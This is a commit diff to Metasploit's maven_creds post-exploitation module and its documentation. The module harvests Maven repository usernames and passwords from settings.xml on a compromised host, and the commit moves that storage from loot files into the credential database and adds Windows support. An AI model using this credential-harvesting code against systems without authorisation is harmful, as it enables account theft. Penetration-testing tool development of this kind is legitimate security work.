Transform loots into creds

Erik Lenoir · Erik Lenoir · commit be2739d335a5 · 2017-08-22T11:57:51.000+02:00
diff --git a/documentation/modules/post/multi/gather/maven_creds.md b/documentation/modules/post/multi/gather/maven_creds.md
@@ -32,14 +32,12 @@ msf post(maven_creds) > run
 [*]     Id: server-nexus
 [*]     Username: deploynexus
 [*]     Password: password
-[+] Saved credentials to /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
 
-msf post(maven_creds) > loot
+msf post(maven_creds) > creds
 
-Loot
-====
-
-host       service  type                name          content     info                                                                           path
-----       -------  ----                ----          -------     ----                                                                           ----
-127.0.0.1           maven.credentials   settings.xml  text/plain  Maven credentials from /home/user/settings.xml and id server-nexus             /home/user/.msf4/loot/20170814145812_default_127.0.0.1_maven.credential_351922.txt
+Credentials
+===========
 
+host  origin  service  public          private     realm           private_type
+----  ------  -------  ------          -------     -----           ------------
+                       deploynexus     password    server-nexus    Password
diff --git a/modules/post/multi/gather/maven_creds.rb b/modules/post/multi/gather/maven_creds.rb
@@ -19,7 +19,7 @@ def initialize(info={})
       },
       'License'        => MSF_LICENSE,
       'Author'         => ['elenoir'],
-      'Platform'       => %w{ bsd linux osx unix },
+      'Platform'       => %w{ bsd linux osx unix win },
       'SessionTypes'   => ['shell','meterpreter']
     ))
   end
@@ -93,10 +93,21 @@ def parse_settings(target, data)
       print_status("    Id: %s" % id)
       print_status("    Username: %s" % username)
       print_status("    Password: %s" % password)
-      loot_path = store_loot("maven.credentials", "text/plain", session, "#{username} #{password}",
-          "settings.xml", "Maven credentials from #{target} and id #{id}")
-      print_good("Saved credentials to #{loot_path}")
       print_line("")
+
+      credential_data = {
+          origin_type: :import,
+          module_fullname: self.fullname,
+          filename: target,
+          service_name: 'maven',
+          realm_value: id,
+          realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+          private_type: :password,
+          private_data: password,
+          username: username,
+          workspace_id: myworkspace_id
+      }
+      create_credential(credential_data)
     end
   end
 
